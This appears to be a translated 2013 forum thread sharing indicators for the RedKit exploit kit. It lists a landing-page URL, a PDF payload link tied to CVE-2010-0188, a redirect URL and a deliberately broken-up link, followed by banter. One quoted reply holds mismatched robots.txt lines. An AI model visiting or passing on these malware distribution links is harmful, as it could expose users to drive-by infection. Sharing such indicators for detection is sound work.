
[Unverified] RedKit exploit kit

firefox3
Posted on 2013-1-6 15:01:51
This post was last edited by firefox3 on 2013-1-6 15:08

bellsouthpwp.net/o/p/opinionated1/sun.html
http://denxc.com/987.pdf
CVE-2010-0188


Shellcode

m220011
Posted on 2013-1-6 15:34:47
A redirect?
to
http://bestcom.sklep.pl/hagn.htm?i=852072
firefox3
OP | Posted on 2013-1-6 15:49:46
m220011 posted on 2013-1-6 15:34
A redirect?
to

No idea.
m220011
Posted on 2013-1-6 15:53:10
firefox3 posted on 2013-1-6 15:49
No idea.

Then where did that block of code below come from?
firefox3
OP | Posted on 2013-1-6 15:56:54
m220011 posted on 2013-1-6 15:53
Then where did that block of code below come from?

Someone else gave it to me, so I just posted it, boss.
firefox3
OP | Posted on 2013-1-6 15:57:21
m220011 posted on 2013-1-6 15:53
Then where did that block of code below come from?

htt  p:/
/denxc.com/62.ht
ml..
m220011
Posted on 2013-1-6 16:09:22
firefox3 posted on 2013-1-6 15:57
htt  p:/
/denxc.com/62.ht
ml..

Dandan,
this URL doesn't need to be decoded.
wjhstu-VxG
Posted on 2013-1-6 16:18:53

What on earth is this... Sister Firefox and mm are a good match
firefox3
OP | Posted on 2013-1-6 16:20:48
wjhstu-VxG posted on 2013-1-6 16:18
User-agent: *
Disallow: /search
Disallow: /sdch

Is MM pretty?
wjhstu-VxG
Posted on 2013-1-6 16:25:54
firefox3 posted on 2013-1-6 16:20
Is MM pretty?

...He's a real man, and a good match for your picture!